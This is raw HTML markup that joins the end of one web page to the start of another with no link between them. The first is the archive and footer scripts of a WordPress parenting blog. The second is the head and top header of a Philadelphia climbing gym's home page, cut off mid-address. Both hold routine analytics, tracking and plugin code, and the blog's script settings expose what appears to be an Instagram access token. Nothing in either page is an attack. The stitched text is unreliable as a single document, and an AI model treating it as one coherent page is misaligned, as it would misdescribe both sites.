2016 </option> <option value='https://www.momrewritten.com/2016/05/'> May 2016 </option> <option value='https://www.momrewritten.com/2016/04/'> April 2016 </option> <option value='https://www.momrewritten.com/2016/03/'> March 2016 </option> <option value='https://www.momrewritten.com/2016/02/'> February 2016 </option> <option value='https://www.momrewritten.com/2016/01/'> January 2016 </option> <option value='https://www.momrewritten.com/2015/12/'> December 2015 </option> <option value='https://www.momrewritten.com/2015/11/'> November 2015 </option> <option value='https://www.momrewritten.com/2015/10/'> October 2015 </option> <option value='https://www.momrewritten.com/2015/09/'> September 2015 </option> <option value='https://www.momrewritten.com/2015/08/'> August 2015 </option> <option value='https://www.momrewritten.com/2015/07/'> July 2015 </option> <option value='https://www.momrewritten.com/2015/06/'> June 2015 </option> <option value='https://www.momrewritten.com/2015/05/'> May 2015 </option> <option value='https://www.momrewritten.com/2015/04/'> April 2015 </option> <option value='https://www.momrewritten.com/2015/03/'> March 2015 </option> <option value='https://www.momrewritten.com/2015/02/'> February 2015 </option> <option value='https://www.momrewritten.com/2015/01/'> January 2015 </option> <option value='https://www.momrewritten.com/2014/12/'> December 2014 </option> <option value='https://www.momrewritten.com/2014/11/'> November 2014 </option> <option value='https://www.momrewritten.com/2014/10/'> October 2014 </option> <option value='https://www.momrewritten.com/2014/09/'> September 2014 </option> <option value='https://www.momrewritten.com/2014/08/'> August 2014 </option> <option value='https://www.momrewritten.com/2014/07/'> July 2014 </option> <option value='https://www.momrewritten.com/2014/06/'> June 2014 </option> </select> <script type='text/javascript'> /* <![CDATA[ */ (function() { var dropdown = document.getElementById( "archives-dropdown-5" ); function onSelectChange() { if ( dropdown.options[ dropdown.selectedIndex ].value !== '' ) { document.location.href = this.options[ this.selectedIndex ].value; } } dropdown.onchange = onSelectChange; })(); /* ]]> */ </script> </div></section> </div></div></div><footer class="site-footer"><div class="wrap"><div class="creds"><p>Copyright &copy; 2019 &middot; <a target="_blank" href="http://restored316designs.com/themes">Tasteful theme</a> by <a target="_blank" href="http://www.restored316designs.com">Restored 316</a></p></div><p></p></div></footer><!-- Instagram Feed JS --> <script type="text/javascript"> var sbiajaxurl = "https://www.momrewritten.com/wp-admin/admin-ajax.php"; </script> <script type="text/javascript" src="//s.skimresources.com/js/106249X1563327.skimlinks.js"></script> <script async>(function(s,u,m,o,j,v){j=u.createElement(m);v=u.getElementsByTagName(m)[0];j.async=1;j.src=o;j.dataset.sumoSiteId='7ea0086070887c0448412c0fc6cf3ec479ed9e61b7c34ea751fe462fcd6b8011';j.dataset.sumoPlatform='wordpress';v.parentNode.insertBefore(j,v)})(window,document,'script','//load.sumo.com/');</script> <script type="application/javascript"> var ajaxurl = "https://www.momrewritten.com/wp-admin/admin-ajax.php"; function sumo_add_woocommerce_coupon(code) { jQuery.post(ajaxurl, { action: 'sumo_add_woocommerce_coupon', code: code, }); } function sumo_remove_woocommerce_coupon(code) { jQuery.post(ajaxurl, { action: 'sumo_remove_woocommerce_coupon', code: code, }); } function sumo_get_woocommerce_cart_subtotal(callback) { jQuery.ajax({ method: 'POST', url: ajaxurl, dataType: 'html', data: { action: 'sumo_get_woocommerce_cart_subtotal', }, success: function(subtotal) { return callback(null, subtotal); }, error: function(err) { return callback(err, 0); } }); } </script> <script type="text/javascript" src="//s.skimresources.com/js/106249X1563327.skimlinks.js"></script><style type="text/css" media="screen"> #simple-social-icons-3 ul li a, #simple-social-icons-3 ul li a:hover, #simple-social-icons-3 ul li a:focus { background-color: #175b6e !important; border-radius: 100px; color: #FFFFFF !important; border: 0px #FFFFFF solid !important; font-size: 14px; padding: 7px; } #simple-social-icons-3 ul li a:hover, #simple-social-icons-3 ul li a:focus { background-color: #f87952 !important; border-color: #FFFFFF !important; color: #FFFFFF !important; } #simple-social-icons-3 ul li a:focus { outline: 1px dotted #f87952 !important; } #simple-social-icons-2 ul li a, #simple-social-icons-2 ul li a:hover, #simple-social-icons-2 ul li a:focus { background-color: #175b6e !important; border-radius: 100px; color: #FFFFFF !important; border: 0px #FFFFFF solid !important; font-size: 18px; padding: 9px; } #simple-social-icons-2 ul li a:hover, #simple-social-icons-2 ul li a:focus { background-color: #f87952 !important; border-color: #FFFFFF !important; color: #FFFFFF !important; } #simple-social-icons-2 ul li a:focus { outline: 1px dotted #f87952 !important; }</style><script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/www.momrewritten.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}}; /* ]]> */ </script> <script type='text/javascript' src='https://www.momrewritten.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var PT_CV_PUBLIC = {"_prefix":"pt-cv-","page_to_show":"5","_nonce":"cda2c42900","is_admin":"","is_mobile":"","ajaxurl":"https:\/\/www.momrewritten.com\/wp-admin\/admin-ajax.php","lang":"","loading_image_src":"data:image\/gif;base64,R0lGODlhDwAPALMPAMrKygwMDJOTkz09PZWVla+vr3p6euTk5M7OzuXl5TMzMwAAAJmZmWZmZszMzP\/\/\/yH\/C05FVFNDQVBFMi4wAwEAAAAh+QQFCgAPACwAAAAADwAPAAAEQvDJaZaZOIcV8iQK8VRX4iTYoAwZ4iCYoAjZ4RxejhVNoT+mRGP4cyF4Pp0N98sBGIBMEMOotl6YZ3S61Bmbkm4mAgAh+QQFCgAPACwAAAAADQANAAAENPDJSRSZeA418itN8QiK8BiLITVsFiyBBIoYqnoewAD4xPw9iY4XLGYSjkQR4UAUD45DLwIAIfkEBQoADwAsAAAAAA8ACQAABC\/wyVlamTi3nSdgwFNdhEJgTJoNyoB9ISYoQmdjiZPcj7EYCAeCF1gEDo4Dz2eIAAAh+QQFCgAPACwCAAAADQANAAAEM\/DJBxiYeLKdX3IJZT1FU0iIg2RNKx3OkZVnZ98ToRD4MyiDnkAh6BkNC0MvsAj0kMpHBAAh+QQFCgAPACwGAAAACQAPAAAEMDC59KpFDll73HkAA2wVY5KgiK5b0RRoI6MuzG6EQqCDMlSGheEhUAgqgUUAFRySIgAh+QQFCgAPACwCAAIADQANAAAEM\/DJKZNLND\/kkKaHc3xk+QAMYDKsiaqmZCxGVjSFFCxB1vwy2oOgIDxuucxAMTAJFAJNBAAh+QQFCgAPACwAAAYADwAJAAAEMNAs86q1yaWwwv2Ig0jUZx3OYa4XoRAfwADXoAwfo1+CIjyFRuEho60aSNYlOPxEAAAh+QQFCgAPACwAAAIADQANAAAENPA9s4y8+IUVcqaWJ4qEQozSoAzoIyhCK2NFU2SJk0hNnyEOhKR2AzAAj4Pj4GE4W0bkJQIAOw=="}; var PT_CV_PAGINATION = {"first":"\u00ab","prev":"\u2039","next":"\u203a","last":"\u00bb","goto_first":"Go to first page","goto_prev":"Go to previous page","goto_next":"Go to next page","goto_last":"Go to last page","current_page":"Current page is","goto_page":"Go to page"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.momrewritten.com/wp-content/plugins/content-views-query-and-display-post-page/public/assets/js/cv.js?ver=2.1.3.3'></script> <script type='text/javascript'> /* <![CDATA[ */ var sb_instagram_js_options = {"sb_instagram_at":"205312436.M2E4MWE5Zg==.YjA0Mzc1OTIxMDc2N.Dk3NWI3YzYxMjRlOTM5MDNiNjg=","font_method":"svg"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.momrewritten.com/wp-content/plugins/instagram-feed/js/sb-instagram.min.js?ver=1.12'></script> <script type='text/javascript' src='https://www.momrewritten.com/wp-content/themes/restored316-tasteful/js/jquery.scrollTo.min.js?ver=1.4.5-beta'></script> <script type='text/javascript' src='https://www.momrewritten.com/wp-content/themes/restored316-tasteful/js/jquery.localScroll.min.js?ver=1.2.8b'></script> <script type='text/javascript' src='https://www.momrewritten.com/wp-content/themes/restored316-tasteful/js/jquery.matchHeight-min.js?ver=1.0.0'></script> <script type='text/javascript' src='https://www.momrewritten.com/wp-content/themes/restored316-tasteful/js/matchheight-init.js?ver=1.0.0'></script> <script type='text/javascript'> /* <![CDATA[ */ var thickboxL10n = {"next":"Next >","prev":"< Prev","image":"Image","of":"of","close":"Close","noiframes":"This feature requires inline frames. You have iframes disabled or your browser does not support them.","loadingAnimation":"https:\/\/www.momrewritten.com\/wp-includes\/js\/thickbox\/loadingAnimation.gif"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.momrewritten.com/wp-includes/js/thickbox/thickbox.js?ver=3.1-20121105'></script> <script type='text/javascript' src='https://www.momrewritten.com/wp-includes/js/wp-embed.min.js?ver=5.2'></script> <script type='text/javascript'> /*Google Tag Manager for Collective Bias*/ dataLayerCBias = [{ 'trackingID': 'UA-64384001-24', 'javaScriptVersion': 'analytics.js', 'homePageURL': 'http://momrewritten.com' }]; </script> <noscript> <iframe src='//www.googletagmanager.com/ns.html?id=GTM-PBN79J' height='0' width='0' style='display:none;visibility:hidden'></iframe> </noscript> <script type='text/javascript'> /*<![CDATA[*/ (function() { window.setTimeout(function() { (function(w, d, s, l, i) { w[l] = w[l] || []; w[l].push({ 'gtm.start': new Date().getTime(), event: 'gtm.js' }); var f = d.getElementsByTagName(s)[0], j = d.createElement(s), dl = l != 'dataLayer' ? '&l=' + l : ''; j.async = true; j.src = '//www.googletagmanager.com/gtm.'+'js?id=' + i + dl; f.parentNode.insertBefore(j, f); })(window, document, 'script', 'dataLayerCBias', 'GTM-PBN79J'); }); })(); /*]]>*/ /*End Google Tag Manager for Collective Bias*/ </script></body></html>
0
<!DOCTYPE html><html lang="en-US" prefix="og: http://ogp.me/ns#" class="no-js scheme_default"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="format-detection" content="telephone=no"><link rel="preload" as="style" onload="this.onload=null;this.rel='stylesheet'" id="ao_optimized_gfonts" href="https://fonts.googleapis.com/css?family=Open+Sans%3A300%2C400%2C600%2C700%2C800%7CRaleway%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C900%7CDroid+Serif%3A400%2C700%7CPT+Sans%3A400%2C700" /><link rel="profile" href="http://gmpg.org/xfn/11"><link rel="pingback" href="https://tufasboulderlounge.com/xmlrpc.php"><link type="text/css" media="all" href="https://tufasboulderlounge.com/wp-content/cache/autoptimize/css/autoptimize_2ef1b96afbfc1d5447eb95cf8e418cd1.css" rel="stylesheet" /><title>Rock Climbing in Philadelphia | Tufas Boulder Lounge</title><meta name="description" content="Tufas Boulder Lounge is a space for indoor rock climbing in Philadelphia. We have Climbing walls, a fitness area, and a lounge with wifi."/><link rel="canonical" href="https://tufasboulderlounge.com/" /><meta property="og:locale" content="en_US" /><meta property="og:type" content="website" /><meta property="og:title" content="Tufas Boulder Lounge" /><meta property="og:description" content="Tufas Boulder Lounge is a space for indoor rock climbing in Philadelphia. We have Climbing walls, a fitness area, and a lounge with wifi." /><meta property="og:url" content="https://tufasboulderlounge.com/" /><meta property="og:site_name" content="Tufas Boulder Lounge" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:description" content="Tufas Boulder Lounge is a space for indoor rock climbing in Philadelphia. We have Climbing walls, a fitness area, and a lounge with wifi." /><meta name="twitter:title" content="Rock Climbing in Philadelphia | Tufas Boulder Lounge" /> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"WebSite","@id":"https://tufasboulderlounge.com/#website","url":"https://tufasboulderlounge.com/","name":"Tufas Boulder Lounge","potentialAction":{"@type":"SearchAction","target":"https://tufasboulderlounge.com/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"Organization","url":"https://tufasboulderlounge.com/","sameAs":["https://www.facebook.com/Tufas-Boulder-Lounge-441113616306649/","https://www.instagram.com/tufas_boulder_lounge"],"@id":"https://tufasboulderlounge.com/#organization","name":"Tufas Boulder Lounge","logo":"https://tufasboulderlounge.com/wp-content/uploads/2018/10/Tufas_Tshirts-3.png"}</script> <meta name="google-site-verification" content="4ZlviP27ZlG0frLgY6Q5TagYQ_uxIDHH6jL4jhctrpw" /><link rel='dns-prefetch' href='//maxcdn.bootstrapcdn.com' /><link rel='dns-prefetch' href='//s.w.org' /><link href='https://fonts.gstatic.com' crossorigin='anonymous' rel='preconnect' /><link rel="alternate" type="application/rss+xml" title="Tufas Boulder Lounge &raquo; Feed" href="https://tufasboulderlounge.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Tufas Boulder Lounge &raquo; Comments Feed" href="https://tufasboulderlounge.com/comments/feed/" /><link rel="alternate" type="text/calendar" title="Tufas Boulder Lounge &raquo; iCal Feed" href="https://tufasboulderlounge.com/events/?ical=1" /> <script type="text/javascript">window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/tufasboulderlounge.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);</script> <link property="stylesheet" rel='stylesheet' id='sb-font-awesome-css' href='https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css' type='text/css' media='all' /> <script type='text/javascript' src='https://tufasboulderlounge.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript'>var gadwpUAEventsData = {"options":{"event_tracking":"1","event_downloads":"zip|mp3*|mpe*g|pdf|docx*|pptx*|xlsx*|rar*","event_bouncerate":"1","aff_tracking":0,"event_affiliates":"\/out\/","hash_tracking":0,"root_domain":"tufasboulderlounge.com","event_timeout":100,"event_precision":0,"event_formsubmit":1,"ga_pagescrolldepth_tracking":1,"ga_with_gtag":0}};</script> <script type='text/javascript'>var mejsL10n = {"language":"en","strings":{"mejs.install-flash":"You are using a browser that does not have Flash player enabled or installed. Please turn on your Flash player plugin or download the latest version from https:\/\/get.adobe.com\/flashplayer\/","mejs.fullscreen-off":"Turn off Fullscreen","mejs.fullscreen-on":"Go Fullscreen","mejs.download-video":"Download Video","mejs.fullscreen":"Fullscreen","mejs.time-jump-forward":["Jump forward 1 second","Jump forward %1 seconds"],"mejs.loop":"Toggle Loop","mejs.play":"Play","mejs.pause":"Pause","mejs.close":"Close","mejs.time-slider":"Time Slider","mejs.time-help-text":"Use Left\/Right Arrow keys to advance one second, Up\/Down arrows to advance ten seconds.","mejs.time-skip-back":["Skip back 1 second","Skip back %1 seconds"],"mejs.captions-subtitles":"Captions\/Subtitles","mejs.captions-chapters":"Chapters","mejs.none":"None","mejs.mute-toggle":"Mute Toggle","mejs.volume-help-text":"Use Up\/Down Arrow keys to increase or decrease volume.","mejs.unmute":"Unmute","mejs.mute":"Mute","mejs.volume-slider":"Volume Slider","mejs.video-player":"Video Player","mejs.audio-player":"Audio Player","mejs.ad-skip":"Skip ad","mejs.ad-skip-info":["Skip in 1 second","Skip in %1 seconds"],"mejs.source-chooser":"Source Chooser","mejs.stop":"Stop","mejs.speed-rate":"Speed Rate","mejs.live-broadcast":"Live Broadcast","mejs.afrikaans":"Afrikaans","mejs.albanian":"Albanian","mejs.arabic":"Arabic","mejs.belarusian":"Belarusian","mejs.bulgarian":"Bulgarian","mejs.catalan":"Catalan","mejs.chinese":"Chinese","mejs.chinese-simplified":"Chinese (Simplified)","mejs.chinese-traditional":"Chinese (Traditional)","mejs.croatian":"Croatian","mejs.czech":"Czech","mejs.danish":"Danish","mejs.dutch":"Dutch","mejs.english":"English","mejs.estonian":"Estonian","mejs.filipino":"Filipino","mejs.finnish":"Finnish","mejs.french":"French","mejs.galician":"Galician","mejs.german":"German","mejs.greek":"Greek","mejs.haitian-creole":"Haitian Creole","mejs.hebrew":"Hebrew","mejs.hindi":"Hindi","mejs.hungarian":"Hungarian","mejs.icelandic":"Icelandic","mejs.indonesian":"Indonesian","mejs.irish":"Irish","mejs.italian":"Italian","mejs.japanese":"Japanese","mejs.korean":"Korean","mejs.latvian":"Latvian","mejs.lithuanian":"Lithuanian","mejs.macedonian":"Macedonian","mejs.malay":"Malay","mejs.maltese":"Maltese","mejs.norwegian":"Norwegian","mejs.persian":"Persian","mejs.polish":"Polish","mejs.portuguese":"Portuguese","mejs.romanian":"Romanian","mejs.russian":"Russian","mejs.serbian":"Serbian","mejs.slovak":"Slovak","mejs.slovenian":"Slovenian","mejs.spanish":"Spanish","mejs.swahili":"Swahili","mejs.swedish":"Swedish","mejs.tagalog":"Tagalog","mejs.thai":"Thai","mejs.turkish":"Turkish","mejs.ukrainian":"Ukrainian","mejs.vietnamese":"Vietnamese","mejs.welsh":"Welsh","mejs.yiddish":"Yiddish"}};</script> <script type='text/javascript'>var _wpmejsSettings = {"pluginPath":"\/wp-includes\/js\/mediaelement\/","classPrefix":"mejs-","stretching":"responsive"};</script> <link rel='https://api.w.org/' href='https://tufasboulderlounge.com/wp-json/' /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://tufasboulderlounge.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://tufasboulderlounge.com/wp-includes/wlwmanifest.xml" /><meta name="generator" content="WordPress 5.2" /><link rel='shortlink' href='https://tufasboulderlounge.com/' /><link rel="alternate" type="application/json+oembed" href="https://tufasboulderlounge.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Ftufasboulderlounge.com%2F" /><link rel="alternate" type="text/xml+oembed" href="https://tufasboulderlounge.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Ftufasboulderlounge.com%2F&#038;format=xml" /> <script type="text/javascript">var ajaxRevslider; jQuery(document).ready(function() { // CUSTOM AJAX CONTENT LOADING FUNCTION ajaxRevslider = function(obj) { // obj.type : Post Type // obj.id : ID of Content to Load // obj.aspectratio : The Aspect Ratio of the Container / Media // obj.selector : The Container Selector where the Content of Ajax will be injected. It is done via the Essential Grid on Return of Content var content = ""; data = {}; data.action = 'revslider_ajax_call_front'; data.client_action = 'get_slider_html'; data.token = '0b89233a37'; data.type = obj.type; data.id = obj.id; data.aspectratio = obj.aspectratio; // SYNC AJAX REQUEST jQuery.ajax({ type:"post", url:"https://tufasboulderlounge.com/wp-admin/admin-ajax.php", dataType: 'json', data:data, async:false, success: function(ret, textStatus, XMLHttpRequest) { if(ret.success == true) content = ret.data; }, error: function(e) { console.log(e); } }); // FIRST RETURN THE CONTENT WHEN IT IS LOADED !! return content; }; // CUSTOM AJAX FUNCTION TO REMOVE THE SLIDER var ajaxRemoveRevslider = function(obj) { return jQuery(obj.selector+" .rev_slider").revkill(); }; // EXTEND THE AJAX CONTENT LOADING TYPES WITH TYPE AND FUNCTION var extendessential = setInterval(function() { if (jQuery.fn.tpessential != undefined) { clearInterval(extendessential); if(typeof(jQuery.fn.tpessential.defaults) !== 'undefined') { jQuery.fn.tpessential.defaults.ajaxTypes.push({type:"revslider",func:ajaxRevslider,killfunc:ajaxRemoveRevslider,openAnimationSpeed:0.3}); // type: Name of the Post to load via Ajax into the Essential Grid Ajax Container // func: the Function Name which is Called once the Item with the Post Type has been clicked // killfunc: function to kill in case the Ajax Window going to be removed (before Remove function ! // openAnimationSpeed: how quick the Ajax Content window should be animated (default is 0.3) } } },30); });</script> <meta name="tec-api-version" content="v1"><meta name="tec-api-origin" content="https://tufasboulderlounge.com"><link rel="https://theeventscalendar.com/" href="https://tufasboulderlounge.com/wp-json/tribe/events/v1/" /> <script type='text/javascript'>!function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod? n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n; n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0; t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window, document,'script','https://connect.facebook.net/en_US/fbevents.js');</script> <script type='text/javascript'>fbq('init', '354671472016474', [], { "agent": "wordpress-5.2-1.7.21" });</script><script type='text/javascript'>fbq('track', 'PageView', []);</script> <noscript> <img height="1" width="1" style="display:none" alt="fbpx" src="https://www.facebook.com/tr?id=354671472016474&ev=PageView&noscript=1" /> </noscript><meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress."/> <!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="https://tufasboulderlounge.com/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--><meta name="generator" content="Powered by Slider Revolution 5.4.5.1 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." /><link rel="icon" href="https://tufasboulderlounge.com/wp-content/uploads/2018/10/cropped-Tufas_A-32x32.png" sizes="32x32" /><link rel="icon" href="https://tufasboulderlounge.com/wp-content/uploads/2018/10/cropped-Tufas_A-192x192.png" sizes="192x192" /><link rel="apple-touch-icon-precomposed" href="https://tufasboulderlounge.com/wp-content/uploads/2018/10/cropped-Tufas_A-180x180.png" /><meta name="msapplication-TileImage" content="https://tufasboulderlounge.com/wp-content/uploads/2018/10/cropped-Tufas_A-270x270.png" /><link rel="stylesheet" href="https://use.typekit.net/zje7pwr.css"> <script>(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-117263224-1', 'auto'); ga('send', 'pageview');</script> <script type="text/javascript">function setREVStartSize(e){ try{ var i=jQuery(window).width(),t=9999,r=0,n=0,l=0,f=0,s=0,h=0; if(e.responsiveLevels&&(jQuery.each(e.responsiveLevels,function(e,f){f>i&&(t=r=f,l=e),i>f&&f>r&&(r=f,n=e)}),t>r&&(l=n)),f=e.gridheight[l]||e.gridheight[0]||e.gridheight,s=e.gridwidth[l]||e.gridwidth[0]||e.gridwidth,h=i/s,h=h>1?1:h,f=Math.round(h*f),"fullscreen"==e.sliderLayout){var u=(e.c.width(),jQuery(window).height());if(void 0!=e.fullScreenOffsetContainer){var c=e.fullScreenOffsetContainer.split(",");if (c) jQuery.each(c,function(e,i){u=jQuery(i).length>0?u-jQuery(i).outerHeight(!0):u}),e.fullScreenOffset.split("%").length>1&&void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0?u-=jQuery(window).height()*parseInt(e.fullScreenOffset,0)/100:void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0&&(u-=parseInt(e.fullScreenOffset,0))}f=u}else void 0!=e.minHeight&&f<e.minHeight&&(f=e.minHeight);e.c.closest(".rev_slider_wrapper").css({height:f}) }catch(d){console.log("Failure at Presize of Slider:"+d)} };</script> <noscript><style type="text/css">.wpb_animate_when_almost_visible { opacity: 1; }</style></noscript><style type="text/css" id="trx_addons-inline-styles-inline-css">.vc_custom_1547497703978{background: #008064 url(https://tufasboulderlounge.com/wp-content/uploads/2017/06/comingsoon1.jpg?id=1516) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1536955050993{margin-top: 0px !important;}.vc_custom_1546887393271{padding-top: 10px !important;padding-bottom: 10px !important;background-color: #008064 !important;}.vc_custom_1546887709685{background-color: #584444 !important;}.vc_custom_1545248068110{background-color: #584444 !important;}.vc_custom_1545248140527{background-color: #584444 !important;}.vc_custom_1522770938144{background-image: url(https://tufasboulderlounge.com/wp-content/uploads/2017/06/Subscribebackground.jpg?id=1107) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1520445992642{margin-top: 0px !important;margin-bottom: 0px !important;}.vc_custom_1520445999128{margin-top: 0px !important;margin-bottom: 0px !important;}.vc_custom_1519590902131{margin-top: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;}.vc_custom_1519737399885{margin-top: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;}.vc_custom_1536969758842{margin-top: 0px !important;}.vc_custom_1519590830723{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;}.vc_custom_1519590865240{margin-left: 35px !important;border-left-width: 35px !important;padding-left: 35px !important;}.vc_custom_1519697417981{margin-top: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;}.vc_custom_1536969675103{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1520856179671{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;}.vc_custom_1520856172562{margin-right: 0px !important;margin-left: 0px !important;border-right-width: 0px !important;border-left-width: 0px !important;padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1520900175496{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;}.vc_custom_1520858828396{margin-top: 0px !important;margin-right: -55px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: -55px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: -55px !important;padding-bottom: 0px !important;padding-left: 0px !important;}.vc_custom_1522941292494{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1519696588405{background-color: #2d3026 !important;}</style></head><body class="home page-template-default page page-id-346 frontpage tribe-no-js body_tag scheme_default blog_mode_front body_style_wide is_stream blog_style_classic_2 sidebar_hide expand_content remove_margins header_style_header-custom-6 header_position_default menu_style_top no_layout wpb-js-composer js-comp-ver-5.4.7 vc_responsive"><div class="body_wrap"><div class="page_wrap"><header class="top_panel top_panel_custom top_panel_custom_6 top_panel_custom_header-default without_bg_image scheme_default"><div class="vc_row wpb_row vc_row-fluid header-1 sc_layouts_row sc_layouts_row_type_narrow scheme_dark"><div class="wpb_column vc_column_container vc_col-sm-12 sc_layouts_column sc_layouts_column_align_center sc_layouts_column_icons_position_left"><div class="vc_column-inner "><div class="wpb_wrapper"><div id="sc_content_1517283433" class="sc_content color_style_default sc_content_default sc_content_width_1_1 sc_float_center"><div class="sc_content_container"><div class="vc_row wpb_row vc_inner vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-12 sc_layouts_column sc_layouts_column_align_right sc_layouts_column_icons_position_left"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="sc_layouts_item"><div id="sc_layouts_iconed_text_1141625231" class="sc_layouts_iconed_text"><a href="https://www.google.com/maps/place/1614+N+5th+St,+Philadelphia,+PA+19122/@39.9758369,-75.1462338,17z/data=!3m1!4b1!4m5!3m4!1s0x89c6c872b8e44d21:0x800d4ef5c9f914bc!8m2!3d39.9758328!4d-75.1440398" class="sc_layouts_item_link sc_layouts_iconed_text_link"><span class="sc_layouts_item_icon sc_layouts_iconed_text_icon icon-map-1"></span><span class="sc_layouts_item_details sc_layouts_iconed_text_details"><span class="sc_layouts_item_details_line2 sc_layouts_iconed_text_line2">1614 N. 5th St, 